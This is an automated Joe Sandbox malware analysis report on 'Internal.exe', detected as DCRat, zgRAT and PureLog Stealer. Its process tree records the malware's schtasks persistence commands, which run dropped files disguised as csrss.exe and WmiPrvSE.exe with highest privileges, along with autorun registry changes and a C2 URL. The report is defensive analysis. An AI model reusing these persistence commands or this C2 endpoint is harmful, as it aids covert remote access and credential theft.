Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Internal.exe

Overview

General Information

Sample name:Internal.exe
Analysis ID:1498678
MD5:15e81b6e3999600603d0f8b0dd22c33e
SHA1:8b76e5db4c4344dc6a011310892d026f2ff95906
SHA256:3a809ac2c5f55a839e15387cb84eba8adee8f402fda2736894d797a57b3e2eb1
Tags:exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Internal.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\Internal.exe" MD5: 15E81B6E3999600603D0F8B0DD22C33E)
    • wscript.exe (PID: 6748 cmdline: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Blockcomcrt\nSU3qQKworl3edB45UU9ztPa7aJlyWb1ixvBGEiQTt7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AgentMonitor.exe (PID: 2300 cmdline: "C:\Blockcomcrt/AgentMonitor.exe" MD5: 84072063FC067434706597D88E3252A9)
          • schtasks.exe (PID: 3324 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2852 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4132 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 3456 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA6D0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 6680 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8B5.tmp" "c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 5868 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6588 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4508 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5628 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6984 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2700 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5548 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 764 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4832 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7052 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1836 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7092 cmdline: schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6692 cmdline: schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3116 cmdline: schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 564 cmdline: schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 632 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 4476 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • WmiPrvSE.exe (PID: 4032 cmdline: "C:\Blockcomcrt\WmiPrvSE.exe" MD5: 84072063FC067434706597D88E3252A9)
  • yxeaYbTPMzNPCanFqSswYWhX.exe (PID: 4536 cmdline: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe" MD5: 84072063FC067434706597D88E3252A9)
  • yxeaYbTPMzNPCanFqSswYWhX.exe (PID: 4788 cmdline: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe" MD5: 84072063FC067434706597D88E3252A9)
  • AgentMonitor.exe (PID: 5612 cmdline: C:\Blockcomcrt\AgentMonitor.exe MD5: 84072063FC067434706597D88E3252A9)
  • AgentMonitor.exe (PID: 5904 cmdline: C:\Blockcomcrt\AgentMonitor.exe MD5: 84072063FC067434706597D88E3252A9)
  • csrss.exe (PID: 6856 cmdline: C:\Recovery\csrss.exe MD5: 84072063FC067434706597D88E3252A9)
  • csrss.exe (PID: 2920 cmdline: C:\Recovery\csrss.exe MD5: 84072063FC067434706597D88E3252A9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-lbrp3oxXXiUX78hSSIVX", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Internal.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Internal.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Blockcomcrt\WmiPrvSE.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000006.00000000.1708671234.0000000000832000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000001.00000003.1412731329.0000000007801000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000001.00000003.1412020893.0000000006E0A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          1.3.Internal.exe.793f2eb.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            1.3.Internal.exe.793f2eb.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              1.3.Internal.exe.6f482eb.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                1.3.Internal.exe.6f482eb.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  6.0.AgentMonitor.exe.830000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetFilename: C:\Recovery\csrss.exe
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Recent\StartMenuExperienceHost.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost
                                    Sigma detected: System File Execution Location Anomaly
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\csrss.exe, CommandLine: C:\Recovery\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Recovery\csrss.exe, ProcessId: 6856, ProcessName: csrss.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yxeaYbTPMzNPCanFqSswYWhX
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe", EventID: 13, EventType: SetValue, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", ProcessId: 3456, ProcessName: csc.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Internal.exe", ParentImage: C:\Users\user\Desktop\Internal.exe, ParentProcessId: 6720, ParentProcessName: Internal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe" , ProcessId: 6748, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Blockcomcrt\AgentMonitor.exe, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Recovery\csrss.exe, CommandLine: C:\Recovery\csrss.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\csrss.exe, NewProcessName: C:\Recovery\csrss.exe, OriginalFileName: C:\Recovery\csrss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Recovery\csrss.exe, ProcessId: 6856, ProcessName: csrss.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline", ProcessId: 3456, ProcessName: csc.exe

                                    Persistence and Installation Behavior

                                    barindex
                                    Sigma detected: Schedule system process
                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Blockcomcrt/AgentMonitor.exe", ParentImage: C:\Blockcomcrt\AgentMonitor.exe, ParentProcessId: 2300, ParentProcessName: AgentMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f, ProcessId: 5628, ProcessName: schtasks.exe

                                    Suricata Signatures

                                    Timestamp:2024-08-25T15:45:44.649080+0200
                                    SID:2048095
                                    Severity:1
                                    Source Port:49707
                                    Destination Port:80
                                    Protocol:TCP
                                    Classtype:A Network Trojan was detected

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: Internal.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://373292cm.nyashka.topAvira URL Cloud: Label: malware
                                    Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpAvira URL Cloud: Label: malware
                                    Source: http://373292cm.nyashka.top/Avira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\fXTLLrxO.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\wekqfedd.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Local\Temp\elmTxMluu5.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\user\Desktop\mVSSSdRf.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\bQCMLIKB.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Recovery\csrss.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Blockcomcrt\AgentMonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Found malware configuration
                                    Source: 00000006.00000002.1763759179.0000000012E58000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-lbrp3oxXXiUX78hSSIVX", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for domain / URL
                                    Source: 373292cm.nyashka.topVirustotal: Detection: 18%Perma Link
                                    Source: http://373292cm.nyashka.topVirustotal: Detection: 18%Perma Link
                                    Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpVirustotal: Detection: 17%Perma Link
                                    Source: http://373292cm.nyashka.top/Virustotal: Detection: 18%Perma Link
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeReversingLabs: Detection: 87%
                                    Source: C:\Blockcomcrt\AgentMonitor.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeReversingLabs: Detection: 87%
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeReversingLabs: Detection: 87%
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\csrss.exeReversingLabs: Detection: 87%
                                    Source: C:\Recovery\csrss.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exeReversingLabs: Detection: 87%
                                    Source: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exeReversingLabs: Detection: 87%
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exeVirustotal: Detection: 54%Perma Link
                                    Source: C:\Users\user\Desktop\RypOpByW.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\UjoVbfCg.logVirustotal: Detection: 10%Perma Link
                                    Source: C:\Users\user\Desktop\Vmjnufha.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\Vmjnufha.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Users\user\Desktop\WuLVbyih.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\WuLVbyih.logVirustotal: Detection: 27%Perma Link
                                    Source: C:\Users\user\Desktop\ZcxEZvOD.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ZcxEZvOD.logVirustotal: Detection: 27%Perma Link
                                    Source: C:\Users\user\Desktop\bQCMLIKB.logVirustotal: Detection: 21%Perma Link
                                    Source: C:\Users\user\Desktop\cQVCqZDT.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\cQVCqZDT.logVirustotal: Detection: 28%Perma Link
                                    Source: C:\Users\user\Desktop\fXTLLrxO.logVirustotal: Detection: 21%Perma Link
                                    Source: C:\Users\user\Desktop\mVSSSdRf.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\mVSSSdRf.logVirustotal: Detection: 69%Perma Link
                                    Source: C:\Users\user\Desktop\wekqfedd.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\wekqfedd.logVirustotal: Detection: 69%Perma Link
                                    Multi AV Scanner detection for submitted file
                                    Source: Internal.exeVirustotal: Detection: 68%Perma Link
                                    Source: Internal.exeReversingLabs: Detection: 76%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJoe Sandbox ML: detected
